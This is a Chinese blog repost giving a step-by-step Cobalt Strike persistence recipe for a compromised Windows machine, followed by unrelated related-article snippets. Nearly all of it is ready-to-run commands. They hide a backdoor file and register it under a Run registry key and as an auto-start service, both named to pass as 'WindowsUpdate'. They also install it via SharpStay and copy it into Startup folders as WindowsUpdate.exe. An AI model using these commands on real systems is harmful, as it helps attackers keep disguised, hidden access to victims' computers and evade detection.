首页 > 其他分享 >cobaltstrike权限维持

cobaltstrike权限维持

时间:2024-09-26 13:24:45浏览次数:6  
标签:exe Windows task cobaltstrike WindowsUpdate shell 权限 Microsoft 维持

1.注册表启动注意:优先用这种方式来进行权限维持task.exe是CS生成的后门文件,这里后门文件可以对其做免杀隐藏文件shell attrib C:\Windows\task.exe   +s +h注册表启动后门文件shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f

2.windows服务自动启动隐藏文件shell attrib C:\Windows\task.exe   +s +h服务自动启动执行后门文件shell sc create "WindowsUpdate"  binpath=  "cmd /c start C:\Windows\task.exe"shell sc config "WindowsUpdate" start= autoshell  net start "WindowsUpdate"或者3.SharpStay.exe 自动化任务启动SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe"
4.自动启动服务目录(win7系统才有效)shell  copy  "C:\Windows\task.exe"   "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y或者copy  " C:\Windows\task.exe"   "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /yshell  attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h

标签:exe,Windows,task,cobaltstrike,WindowsUpdate,shell,权限,Microsoft,维持
From: https://www.cnblogs.com/backlion/p/18433250

相关文章

  • LDAP学习笔记之八:openLDAP sudo权限
    一、openLDAPsudo权限常见属性sudoCommand:可执行的二进制命令,如useradd、userdel、mount、umount等。sudoHost:可在哪些机器上执行sudoCommand定义的BASH命令。sudoNotAfter:起始时间sudo规则匹配。sudoNotBefore:结束时间sudo规则匹配。sudoOption:定义超过自身权限及切换至......
  • windows hosts 你没有权限在此位置中保存文件 请与管理员联系
    一、问题现象administrator管理管理员打开hosts没有权限,修改hosts内容后没有权限保存,提示C:\Windows\System32\drivers\etc\hosts你没有去权限在此位置中保存文件。二、解决问题右键点击hosts---属性---安全---高级---更改权限点击添加进行新增权限设置选则主体---检查名称框输入用......
  • linux常见指令与权限【第四课】
    19.tar指令(重要):打包/解包,不打开它,直接看内容         tar[-cxtzjvf] :-c :建立一个压缩文件的参数指令(create 的意思);-x :解开一个压缩文件的参数指令!-t :查看 tarfile 里面的文件!-z :是否同时具有 gzip 的属性?亦即是否需要......
  • java实现角色及菜单权限
    在Java中实现角色及菜单权限通常涉及几个关键组件:用户(User)、角色(Role)、权限(Permission)以及它们之间的关系。下面我将概述一个基本的实现方案,包括数据库设计和代码层面的处理。1.数据库设计表设计用户表(users)user_id(主键)usernamepassword...角色表(roles)role_id(主键)role_name.......
  • 【Linux】指令和权限的这些细节,你确定都清楚吗?
    ......
  • Vue3路由权限控制
    Vue3路由权限控制设置路由:静态路由与动态路由静态路由:这些是在应用启动时就已经定义好的路由,通常包括一些不需要权限验证的公共页面,如登录页、404页面等。动态路由:这些路由是根据用户的权限决定的,通常包括需要权限验证的页面。登录获取token/sessionId等数据,利用pi......
  • 如何在 CentOS 中进入 root 权限
    作为一名服务器管理员,有时您需要以root用户身份执行任务以进行管理操作。以下是两种在CentOS中执行此操作的方法:方法1:使用sudosudo命令允许您以root用户的身份执行特定命令,而无需更改用户会话。要使用此方法:在终端中键入以下命令:1sudo-i系统会提......
  • MySQL深度探索:掌握触发器自动化与精细用户权限管理,提升数据库效能与安全
     作者简介:我是团团儿,是一名专注于云计算领域的专业创作者,感谢大家的关注 座右铭:   云端筑梦,数据为翼,探索无限可能,引领云计算新纪元 个人主页:团儿.-CSDN博客目录前言:触发器(Triggers):用户权限(UserPermissions):一.触发器1.MySQL触发器简介2.引发触发器执行的事件,......
  • Oracle数据库中创建用户并对用户授予特定的视图访问权限。
    1.创建用户名和密码---创建用户名密码createuseruseridentifiedbypassword;--userpassword分别为用户名及密码登录用户使用defaulttablespacetsp_ehis_indextemporarytablespacetsp_ehis_tempprofiledefault;2.对用户进行相对应的授权增加用户的......
  • 从0到1搭建权限管理系统系列三 .net8 JWT创建Token并使用Av
    说明该文章是属于OverallAuth2.0系列文章,每周更新一篇该系列文章(从0到1完成系统开发)。该系统文章,我会尽量说的非常详细,做到不管新手、老手都能看懂。说明:OverallAuth2.0是一个简单、易懂、功能强大的权限+可视化流程管理系统。结合上一篇文章使用,味道更佳:从0到1搭建权限管理......